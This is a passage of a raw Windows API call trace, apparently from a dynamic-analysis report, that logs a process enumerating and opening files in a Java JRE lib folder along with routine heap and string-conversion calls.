dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0097.272] GetFileType (hFile=0x33c) returned 0x1 [0097.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0097.272] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0097.272] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0097.272] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0097.273] CloseHandle (hObject=0x33c) returned 1 [0097.273] AreFileApisANSI () returned 1 [0097.273] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0097.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6e) returned 0x75fa8 [0097.273] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x75fa8, cchWideChar=55 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr\\profile.jfc") returned 55 [0097.273] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr\\profile.jfc" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jfr\\profile.jfc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0097.273] GetFileType (hFile=0x33c) returned 0x1 [0097.273] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0097.273] CloseHandle (hObject=0x33c) returned 1 [0097.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.273] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.273] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.273] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.273] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.274] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.274] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.274] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.274] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.274] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.274] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.274] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.274] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.274] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.274] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.274] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.274] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.274] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.274] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.274] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.274] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.274] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.274] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.274] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.274] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.274] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.274] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.274] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.274] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.274] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.274] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.274] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.274] AreFileApisANSI () returned 1 [0097.274] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0097.274] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6e) returned 0x75cd8 [0097.274] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x75cd8, cchWideChar=55 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr\\profile.jfc") returned 55 [0097.274] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr\\profile.jfc" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jfr\\profile.jfc"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c50c02, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4e61)) returned 1 [0097.274] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0097.274] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0097.274] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0097.275] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0097.275] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.275] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.275] FindNextFileW (in: hFindFile=0x78190, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x6c, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x69db8, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x6c, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="\\j", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓乡")) returned 0 [0097.275] FindClose (in: hFindFile=0x78190 | out: hFindFile=0x78190) returned 1 [0097.275] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0097.275] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0097.275] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0097.275] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0097.275] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0097.275] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0097.275] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0097.275] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0097.275] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0097.275] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46358 | out: hHeap=0x20000) returned 1 [0097.275] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0097.275] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0097.275] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0097.275] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0097.275] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0097.275] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0097.275] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0097.275] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0097.275] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0097.275] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x69db0 [0097.275] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0097.275] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0097.275] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0097.275] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.275] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.275] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.275] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.275] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0097.275] AreFileApisANSI () returned 1 [0097.276] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr.jar", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr.jar", lpUsedDefaultChar=0x0) returned 47 [0097.276] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0097.276] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.276] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.276] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0097.276] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0097.276] AreFileApisANSI () returned 1 [0097.276] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e148, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0097.276] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71ca0 [0097.276] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e148, cbMultiByte=-1, lpWideCharStr=0x71ca0, cchWideChar=47 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr.jar") returned 47 [0097.276] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jfr.jar"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0097.276] GetFileType (hFile=0x368) returned 0x1 [0097.276] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0097.276] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0097.277] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0097.277] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0097.277] CloseHandle (hObject=0x368) returned 1 [0097.277] AreFileApisANSI () returned 1 [0097.277] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e148, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0097.277] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71758 [0097.277] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e148, cbMultiByte=-1, lpWideCharStr=0x71758, cchWideChar=47 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr.jar") returned 47 [0097.277] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jfr.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0097.277] GetFileType (hFile=0x368) returned 0x1 [0097.277] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0097.277] CloseHandle (hObject=0x368) returned 1 [0097.277] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0097.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0097.278] AreFileApisANSI () returned 1 [0097.278] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e148, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0097.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x719c8 [0097.278] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e148, cbMultiByte=-1, lpWideCharStr=0x719c8, cchWideChar=47 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr.jar") returned 47 [0097.278] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jfr.jar"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c50c02, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x88dc5)) returned 1 [0097.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0097.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0097.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0097.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0097.278] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.278] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.278] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c50c02, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x848c, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="jfxswt.jar", cAlternateFileName="")) returned 1 [0097.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0097.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0097.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0097.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35090 [0097.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0097.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35090 | out: hHeap=0x20000) returned 1 [0097.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0097.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0097.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0097.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0097.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0097.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a9b0 [0097.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0097.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0097.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0097.279] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.279] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.279] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.279] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0097.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.279] AreFileApisANSI () returned 1 [0097.279] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfxswt.jar", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfxswt.jar", lpUsedDefaultChar=0x0) returned 50 [0097.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0097.279] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.279] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0097.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0097.279] AreFileApisANSI () returned 1 [0097.279] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0097.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x64) returned 0x46828 [0097.280] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x46828, cchWideChar=50 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfxswt.jar") returned 50 [0097.280] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfxswt.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jfxswt.jar"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0097.520] GetFileType (hFile=0x360) returned 0x1 [0097.521] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46828 | out: hHeap=0x20000) returned 1 [0097.521] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0097.521] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0097.521] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0097.521] CloseHandle (hObject=0x360) returned 1 [0097.521] AreFileApisANSI () returned 1 [0097.521] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0097.521] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x64) returned 0x45e88 [0097.521] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x45e88, cchWideChar=50 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfxswt.jar") returned 50 [0097.522] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfxswt.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jfxswt.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, 